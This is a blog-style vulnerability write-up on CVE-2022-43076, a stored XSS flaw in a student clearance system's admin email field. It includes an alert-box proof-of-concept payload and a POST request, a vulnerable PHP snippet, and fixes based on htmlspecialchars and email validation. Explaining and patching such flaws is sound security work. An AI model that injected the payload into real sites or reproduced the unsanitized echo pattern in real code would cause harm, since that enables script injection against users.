Web applications are a steady source of vulnerabilities, and CVE-2022-43076 is a good example. This vulnerability affects the popular *Web-Based Student Clearance System v1.*, specifically its edit administrator page. Here’s a breakdown of the vulnerability, a proof of concept, and what you can do to avoid getting hacked.

What is CVE-2022-43076?

CVE-2022-43076 is a Cross-Site Scripting (XSS) vulnerability in the /admin/edit-admin.php page. It allows attackers to inject malicious scripts directly into the application using the txtemail parameter. Once injected, these payloads can run in the browsers of users who visit the affected page — bad news for anyone with admin rights or sensitive information.

Where’s The Flaw?

The problem lies in not cleaning (sanitizing) or blocking special HTML characters submitted in the txtemail form input. Instead of just an email address, any text — including actual JavaScript code — can be saved and later executed.

Step 1: Find the Admin Edit Form

Navigate to:  
http://localhost/student_clearance_system/admin/edit-admin.php?editid=1

Step 2: Enter this in the Email field (txtemail)

"><script>alert('XSS!')</script>

Step 3: Submit the Form

When the admin or anyone with access to /admin/edit-admin.php views the email, our payload will execute a JavaScript alert popup — that means XSS is working.

Here's what the POST request might look like:

POST /admin/edit-admin.php?editid=1 HTTP/1.1
Host: target.site
Content-Type: application/x-www-form-urlencoded

txtname=John+Doe&txtemail=%22%3E%3Cscript%3Ealert('XSS!')%3C%2Fscript%3E


When this data is rendered in the admin panel, that JavaScript code will run!

Real-World Screenshot (Conceptual)

*Imagine seeing a pop-up saying "XSS!" every time you try to edit an admin’s details — that’s this bug in action.*

Here’s a simplified version of what the vulnerable code might look like

// Vulnerable code: no sanitization
$email = $_POST['txtemail'];
echo "<input type='text' name='txtemail' value='$email'>";

Escape or sanitize the input before displaying it:

$email = htmlspecialchars($_POST['txtemail'], ENT_QUOTES, 'UTF-8');
echo "<input type='text' name='txtemail' value='$email'>";

Just a single PHP function would stop this attack!
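The fix above combined with input validation, as an added example that is not code from the project or from the advisory: `clean_email()`, `h()` and `render_email_field()` are hypothetical names, and the sample inputs are constructed. It validates `txtemail` when the form is submitted and still encodes on output, since a syntactically valid address can contain an apostrophe and rows saved before the fix may already hold markup.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code; all function names are hypothetical.

// Encode a value for a quoted HTML attribute or element text.
function h(string $value): string
{
    // ENT_QUOTES covers both quote styles, so the result is safe whether the
    // template uses value='...' or value="...". ENT_SUBSTITUTE keeps invalid
    // UTF-8 from turning the whole string into "".
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Input side: accept only a syntactically valid address, otherwise null.
function clean_email(string $raw): ?string
{
    $raw = trim($raw);
    if ($raw === '' || strlen($raw) > 254) {
        return null;
    }
    $email = filter_var($raw, FILTER_VALIDATE_EMAIL);
    return $email === false ? null : $email;
}

// Output side: always encode, even for values that passed validation,
// because rows written before the fix may already hold markup.
function render_email_field(string $stored): string
{
    return "<input type='text' name='txtemail' value='" . h($stored) . "'>";
}

// Constructed sample inputs.
$samples = [
    'admin@example.edu',
    "o'brien@example.edu",               // apostrophe is legal in an address
    "\"><script>alert('XSS!')</script>", // the payload shown on this page
];

foreach ($samples as $raw) {
    $label = clean_email($raw) === null ? 'rejected: ' : 'accepted: ';
    echo $label, h($raw), PHP_EOL;
    // Render the raw value too, as if it were a legacy row in the database.
    echo '  field: ', render_email_field($raw), PHP_EOL;
}
```

Run it with the PHP CLI to compare the validation result with the encoded field markup for each sample.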

Official CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43076

Exploit-DB Entry:

https://www.exploit-db.com/exploits/51151

Packet Storm Mirror:

https://packetstormsecurity.com/files/169316/

Conclusion

CVE-2022-43076 is proof that even common mistakes — like missing input validation — can have big consequences. If you use the *Web-Based Student Clearance System v1.*, patch it up ASAP or apply input sanitization yourself.

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/01/2022 20:42:00 UTC